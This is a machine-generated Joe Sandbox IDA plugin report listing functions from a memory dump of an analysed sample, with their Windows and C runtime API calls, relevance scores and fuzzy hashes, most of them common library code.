Function 005070EB Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(9496FA04,?,00000000,00000000), ref: 0050714E

Part of subcall function 0050D258: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,&{P,0000FDE9,?,?,00000000,?,0050781F,0000FDE9,00000000,?), ref: 0050D304

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005073A9
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005073F1
GetLastError.KERNEL32 ref: 00507494

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: eb0acda4ee26f6b9a23caa4f60c9b96cf9d160fc4a1a796fcc1cdac11c7b4224
Instruction ID: 8530ab66e145cedd4d98993ae99ea0dca1e06dcceecc4205323bfb8b3050d437
Opcode Fuzzy Hash: eb0acda4ee26f6b9a23caa4f60c9b96cf9d160fc4a1a796fcc1cdac11c7b4224
Instruction Fuzzy Hash: B6D169B5E042499FCF15CFA8D8809ADBFB5FF49300F18456AE855EB392D730A946CB60

Function 004D2510 Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004D2645

Part of subcall function 004CF409: __aulldvrm.LIBCMT ref: 004CF43A

DName::operator+.LIBCMT ref: 004D25A6
DName::operator=.LIBVCRUNTIME ref: 004D268A
DName::DName.LIBVCRUNTIME ref: 004D26BC

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::Name::operator=__aulldvrm
String ID:
API String ID: 2973644308-0
Opcode ID: e7d5a2497575c9fc80cd775d23e9c48b89f331384e26b90566c900dc963e3a9a
Instruction ID: 39e7d0638b63acb3f29fcc553ee09c7698cf654b5e25e7fc25ef9c7d7e1558a3
Opcode Fuzzy Hash: e7d5a2497575c9fc80cd775d23e9c48b89f331384e26b90566c900dc963e3a9a
Instruction Fuzzy Hash: 8E61BEB4900315DFEB14CF94DA61AAEBBB0FB65700F10805BE4066B391C7B89E45DF98

Function 004CDADF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004CDBA6
___AdjustPointer.LIBCMT ref: 004CDBC9
___AdjustPointer.LIBCMT ref: 004CDC65

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b2fadd1d6c17830b5dd431f6c2a187fc5afd362f1e83323615c17a23535d5d14
Instruction ID: bf83e80e06834b2ce9f46d4dd8ece974d40a036418ec374862e52481bbf97dee
Opcode Fuzzy Hash: b2fadd1d6c17830b5dd431f6c2a187fc5afd362f1e83323615c17a23535d5d14
Instruction Fuzzy Hash: 8A510E7EA00206AFDBA89F05C841F7AB3A4EF04304F10453FE90647291E778EC91CB58

Function 004AA7CF Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004AA7D6

Part of subcall function 004A5B49: __EH_prolog3.LIBCMT ref: 004A5B50
Part of subcall function 004A5B49: std::_Lockit::_Lockit.LIBCPMT ref: 004A5B5B
Part of subcall function 004A5B49: std::locale::_Setgloballocale.LIBCPMT ref: 004A5B76
Part of subcall function 004A5B49: _Yarn.LIBCPMT ref: 004A5B8C
Part of subcall function 004A5B49: std::_Lockit::~_Lockit.LIBCPMT ref: 004A5BC9

std::_Lockit::_Lockit.LIBCPMT ref: 004AA7FA
std::locale::_Setgloballocale.LIBCPMT ref: 004AA849
std::_Lockit::~_Lockit.LIBCPMT ref: 004AA8A9

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocalestd::locale::_$Yarn
String ID:
API String ID: 2301162320-0
Opcode ID: d9d239eee71c8a564a08d7d4acb1813ef9675f1b9299efd07f36717444980d0a
Instruction ID: 2714ba2acca83379c0e6a940cae4f80ab97974bb75d42d202030a6e89b13b18e
Opcode Fuzzy Hash: d9d239eee71c8a564a08d7d4acb1813ef9675f1b9299efd07f36717444980d0a
Instruction Fuzzy Hash: 7B218D35B102148FDB04EF28D8C196E77A4AF5A314B04406EE802DB382DB38ED12DB99

Function 0050E45F Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0050D258: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,&{P,0000FDE9,?,?,00000000,?,0050781F,0000FDE9,00000000,?), ref: 0050D304

GetLastError.KERNEL32 ref: 0050E4C3
__dosmaperr.LIBCMT ref: 0050E4CA
GetLastError.KERNEL32(?,?,?,?), ref: 0050E504
__dosmaperr.LIBCMT ref: 0050E50B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 4beb4a5b1138350586cc3d80d8f6faea214c9645c233d6f2a064f34853df06d1
Instruction ID: d903cff039dfc02c5ab21ce3a4250fb4706636004cd45922e7acb0d16ab15f4d
Opcode Fuzzy Hash: 4beb4a5b1138350586cc3d80d8f6faea214c9645c233d6f2a064f34853df06d1
Instruction Fuzzy Hash: 6B21F571600606AFDF20AF61CD8692FBFA9FF403687208C6DF91993681E774EC1087A1

Function 004FAE84 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a478021bdfdae351db6dc8d38c96125eb45d90cbe3614a65460bf0be440b39
Instruction ID: a49935d1f74ced365ff72398c5e0860b6d653dbf381e90ce701b4e583dcfe5e1
Opcode Fuzzy Hash: 92a478021bdfdae351db6dc8d38c96125eb45d90cbe3614a65460bf0be440b39
Instruction Fuzzy Hash: 0521A4F1204209AFDB20AF61CC4597B7769EF40364710855BFA1DCB241DB39ED2187BA

Function 005101B5 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 005101BD

Part of subcall function 0050D258: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,&{P,0000FDE9,?,?,00000000,?,0050781F,0000FDE9,00000000,?), ref: 0050D304

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005101F5
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00510215

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 9d6065d6f838f28f02fa05c2cdb7f0dbefc8067a233322224b1995a1c4100dd7
Instruction ID: ca025f46f7d17ae6cff62bfb3616ecfdd97df16e5a99513231c3d0651c995d7f
Opcode Fuzzy Hash: 9d6065d6f838f28f02fa05c2cdb7f0dbefc8067a233322224b1995a1c4100dd7
Instruction Fuzzy Hash: 8011CEF560050A7EBB2127B19C8DCBF6E6EEED63943100424F91191181EEB8CEC1D6B0

Function 004D66B0 Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,004D6405,00000000,00000004,00000000), ref: 004D66FF
GetLastError.KERNEL32 ref: 004D670B
__dosmaperr.LIBCMT ref: 004D6712

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 22b5eaded025091908cd6b1360ff09f36264be335d32a00bfcb2d2e6a9ba26a3
Instruction ID: 6478452e9f6836541eba508183aae50dd2b0877f68695e65e9e8997fb61e99a6
Opcode Fuzzy Hash: 22b5eaded025091908cd6b1360ff09f36264be335d32a00bfcb2d2e6a9ba26a3
Instruction Fuzzy Hash: 4F014972500208BBCB109FA5DC19B9E7AB9DF81779F22421FF524923D0DB78CA41DB68

Function 00509935 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 0050994B
GetLastError.KERNEL32(?,?,?,?), ref: 00509958
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 0050997E
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 005099A4

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 20826c9a027d1a5df3c9a73d4629f8a1312626ef6381695c6e2a7f362eefc61c
Instruction ID: fc877cc7af9f347fff7dacd3fb47ab40581ddf77aaf235075131bbb05263a99b
Opcode Fuzzy Hash: 20826c9a027d1a5df3c9a73d4629f8a1312626ef6381695c6e2a7f362eefc61c
Instruction Fuzzy Hash: 2F115371800219BFDF209FA6CC089DE7F79FF057A1F104949F824A21A2C7358A60EBA0

Function 0051BBE6 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0051BC00
GetLastError.KERNEL32 ref: 0051BC0C

Part of subcall function 0051BCB5: CloseHandle.KERNEL32(FFFFFFFE,0051BCFF,?,00514F9D,00000000,00000001,00000000,00000000,?,005074E8,00000000,?,00000000,00000000,00000000), ref: 0051BCC5

___initconout.LIBCMT ref: 0051BC1C

Part of subcall function 0051BC77: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0051BCA6,00514F8A,00000000,?,005074E8,00000000,?,00000000,00000000), ref: 0051BC8A

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0051BC30

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 4cd525d478fb9a25a30152d3ba516cf60f56241f88accbb13d65b1786c1bd445
Instruction ID: a3a8ae8b54b0b8b9931f6bf153bd741d3a6e31302bf4c440f4e40b5eed0d8993
Opcode Fuzzy Hash: 4cd525d478fb9a25a30152d3ba516cf60f56241f88accbb13d65b1786c1bd445
Instruction Fuzzy Hash: 77F05436100106ABDB221B95EC08D867F77FFDA7517104415F59582530CB329865EBA0

Function 0051BCCC Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00514F9D,00000000,00000001,00000000,00000000,?,005074E8,00000000,?,00000000), ref: 0051BCE3
GetLastError.KERNEL32(?,00514F9D,00000000,00000001,00000000,00000000,?,005074E8,00000000,?,00000000,00000000,00000000,?,00507AB7,?), ref: 0051BCEF

Part of subcall function 0051BCB5: CloseHandle.KERNEL32(FFFFFFFE,0051BCFF,?,00514F9D,00000000,00000001,00000000,00000000,?,005074E8,00000000,?,00000000,00000000,00000000), ref: 0051BCC5

___initconout.LIBCMT ref: 0051BCFF

Part of subcall function 0051BC77: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0051BCA6,00514F8A,00000000,?,005074E8,00000000,?,00000000,00000000), ref: 0051BC8A

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00514F9D,00000000,00000001,00000000,00000000,?,005074E8,00000000,?,00000000,00000000), ref: 0051BD14

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: bd61948ec4d714f06b6dd3cc5e80323d2c425f473204f57ab771fc9e1bb4afbe
Instruction ID: 04521bfcc4105d101e7899397a22451a3309eecbfddeb783bc75dd9ba6776dac
Opcode Fuzzy Hash: bd61948ec4d714f06b6dd3cc5e80323d2c425f473204f57ab771fc9e1bb4afbe
Instruction Fuzzy Hash: 36F01C3610011ABBDF222F91EC09AD97F26FF593A1F044021FA1995120CB328964EBD0

Function 00503140 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 005032B7

Strings

-, xrefs: 00503208
+, xrefs: 00503215

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 2c3a55946a6f97b255a2574ad8075b0765961792e42331e8f8739d8656b42d05
Instruction ID: 9b38138f709ceed98925cfadc036f5736edefd496e2be0385c7c9c5dac12b7a5
Opcode Fuzzy Hash: 2c3a55946a6f97b255a2574ad8075b0765961792e42331e8f8739d8656b42d05
Instruction Fuzzy Hash: 8AA1F434A44249AFDF24CF69C8816EE7FA9FF56324F188959ECA19B2C1D634DB01CB50

Function 004C178B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004C1792
__cftoe.LIBCMT ref: 004C1825

Strings

!%x, xrefs: 004C17A0

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: dd83a30a1a2b5c4daf4ac0d8e7d9d5f6cedb751f91e888d30119da18713790fb
Instruction ID: 08cae09d3bd1aea73449e6d77a6841f33795e98d94d813dd7dbfdb27fea5a11e
Opcode Fuzzy Hash: dd83a30a1a2b5c4daf4ac0d8e7d9d5f6cedb751f91e888d30119da18713790fb
Instruction Fuzzy Hash: B7714975D00109AFDF18EFA8E891AEEB7B5EF49304F10452EF415A7262EB38AD41CB54

Function 004C19A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004C19AC
__cftoe.LIBCMT ref: 004C1A3F

Strings

!%x, xrefs: 004C19BA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: fb0e6abb59bbb6a66296fd19077ca0fb6c0cb07ffd5179be8a1539feaadc98cc
Instruction ID: 9eb001df3fba0601677cf6cac4ddd85301eecb9648e483a6d9302301ef2a23c4
Opcode Fuzzy Hash: fb0e6abb59bbb6a66296fd19077ca0fb6c0cb07ffd5179be8a1539feaadc98cc
Instruction Fuzzy Hash: 01715A75D01108AFDF18EFA8E881AEEB7B5EF49304F10416EF415A7261EB39AD41CB54

Function 004C0077 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004C007E
swprintf.LIBCMT ref: 004C00F6

Part of subcall function 004B4D48: __EH_prolog3.LIBCMT ref: 004B4D4F
Part of subcall function 004B4D48: std::_Lockit::_Lockit.LIBCPMT ref: 004B4D59
Part of subcall function 004B4D48: int.LIBCPMT ref: 004B4D70

Part of subcall function 004B05E2: _wmemset.LIBCMT ref: 004B060B

Strings

%.0Lf, xrefs: 004C00EE

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3_LockitLockit::__wmemsetstd::_swprintf
String ID: %.0Lf
API String ID: 2528782737-1402515088
Opcode ID: 573fbec570f8f05a0bd0fdd1c5b0a0222b015db66016c7f19b863c0f8bb18535
Instruction ID: e406c512afae4f0727926fc7fc23869de2ca49242ddce287ac4dc2c974272677
Opcode Fuzzy Hash: 573fbec570f8f05a0bd0fdd1c5b0a0222b015db66016c7f19b863c0f8bb18535
Instruction Fuzzy Hash: AD619975D00218EBCF09DFE4D885AEDBBB8FF48304F20455EE402AB291EB399915CB94

Function 004C03A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004C03AB
swprintf.LIBCMT ref: 004C0423

Part of subcall function 004B4DDD: __EH_prolog3.LIBCMT ref: 004B4DE4
Part of subcall function 004B4DDD: std::_Lockit::_Lockit.LIBCPMT ref: 004B4DEE
Part of subcall function 004B4DDD: int.LIBCPMT ref: 004B4E05

Part of subcall function 004B0669: _wmemset.LIBCMT ref: 004B0692

Strings

%.0Lf, xrefs: 004C041B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3_LockitLockit::__wmemsetstd::_swprintf
String ID: %.0Lf
API String ID: 2528782737-1402515088
Opcode ID: 208ff8fa0bff66d49735d434fee3f05472a1b671bbb0e91b46fd42791334bf6f
Instruction ID: 78d75ce4e5d18482f344510073b1a60b50b8d14fda3e1636458fd6c5028ea43a
Opcode Fuzzy Hash: 208ff8fa0bff66d49735d434fee3f05472a1b671bbb0e91b46fd42791334bf6f
Instruction Fuzzy Hash: E5616775D00218EBCF09DFE4C885AEEBBB9FF48304F10451AE502AB291EB389955CF94

Function 004C6696 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004C669D
swprintf.LIBCMT ref: 004C6715

Part of subcall function 004A3037: __EH_prolog3.LIBCMT ref: 004A303E
Part of subcall function 004A3037: std::_Lockit::_Lockit.LIBCPMT ref: 004A3048
Part of subcall function 004A3037: int.LIBCPMT ref: 004A305F
Part of subcall function 004A3037: std::_Lockit::~_Lockit.LIBCPMT ref: 004A30B9

Strings

%.0Lf, xrefs: 004C670D

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_swprintf
String ID: %.0Lf
API String ID: 2994408256-1402515088
